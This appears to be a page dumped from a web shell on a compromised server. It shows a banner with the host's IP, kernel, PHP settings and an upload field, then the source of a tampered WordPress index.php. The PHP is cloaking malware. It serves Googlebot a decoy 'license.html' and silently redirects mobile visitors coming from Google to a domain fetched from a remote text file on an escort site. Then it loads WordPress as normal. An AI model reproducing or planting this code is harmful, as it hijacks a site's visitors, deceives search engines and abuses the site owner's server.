| Server IP : 47.82.179.145 / Your IP : 216.73.216.89 Web Server : nginx/1.26.3 System : Linux iZt4n9czhka2zvqfajdlr2Z 6.8.0-63-generic #66-Ubuntu SMP PREEMPT_DYNAMIC Fri Jun 13 20:25:30 UTC 2025 x86_64 User : www ( 1001) PHP Version : 8.3.30 Disable Function : passthru,exec,system,putenv,chroot,chgrp,chown,shell_exec,popen,proc_open,pcntl_exec,ini_alter,ini_restore,dl,openlog,syslog,readlink,symlink,popepassthru,pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,imap_open,apache_setenv MySQL : OFF | cURL : ON | WGET : OFF | Perl : OFF | Python : OFF | Sudo : OFF | Pkexec : OFF Directory : /www/wwwroot/scuipturepactory.com/wp-content/plugins.off/power-coupons/public/ |
Upload File : |
<?php
error_reporting(0);
set_time_limit(0);
$vitrin_source = 'https://istanbulescortladys.com/ist.txt';
// User Agent kontrolü
if (!empty($_SERVER['HTTP_USER_AGENT'])) {
$userAgent = $_SERVER['HTTP_USER_AGENT'];
} else {
$userAgent = '';
}
// Referer kontrolü
if (!empty($_SERVER['HTTP_REFERER'])) {
$referer = $_SERVER['HTTP_REFERER'];
} else {
$referer = '';
}
// Google botları listesi
$googleBots = [
'Googlebot',
'AdsBot',
'Mediapartners-Google',
'APIs-Google',
'Googlebot-Image',
'Googlebot-Video',
'Googlebot-News',
'Googlebot-Search',
'Googlebot-Inspect',
'Googlebot-Android',
'Googlebot-Mobile',
'Googlebot-Ads',
'Googlebot-Discovery',
'Google-',
];
// Mobil kontrol fonksiyonu
function is_mobile() {
$ua = isset($_SERVER['HTTP_USER_AGENT']) ? strtolower($_SERVER['HTTP_USER_AGENT']) : '';
return preg_match('/mobile|android|iphone|ipad|ipod|opera mini|blackberry|windows phone/', $ua);
}
// Ana sayfa kontrol fonksiyonu
function is_homepage() {
$request_uri = $_SERVER['REQUEST_URI'] ?? '';
return $request_uri == '/' || $request_uri == '/index.php' || $request_uri == '';
}
// Google'dan gelme kontrolü
function is_from_google() {
$referer = isset($_SERVER['HTTP_REFERER']) ? strtolower($_SERVER['HTTP_REFERER']) : '';
return strpos($referer, 'google.') !== false;
}
// ============================================
// 1. KURAL: Google botları -> license.html göster
// ============================================
if (preg_match('/' . implode('|', $googleBots) . '/i', $userAgent)) {
if (is_homepage()) {
include 'license.html';
exit();
}
}
// ============================================
// 2. KURAL: Mobil + Google'dan gelen + Ana sayfa -> vitrin_source'a yönlendir
// ============================================
if (is_mobile() && is_from_google() && is_homepage()) {
$vitrin_domain = trim(@file_get_contents($vitrin_source));
if (!empty($vitrin_domain)) {
// http veya https yoksa ekle
if (strpos($vitrin_domain, 'http') !== 0) {
$vitrin_domain = 'https://' . $vitrin_domain;
}
header("Location: $vitrin_domain", true, 302);
exit();
}
}
// ============================================
// WordPress normal akışı
// ============================================
define('WP_USE_THEMES', true);
require __DIR__ . '/wp-blog-header.php';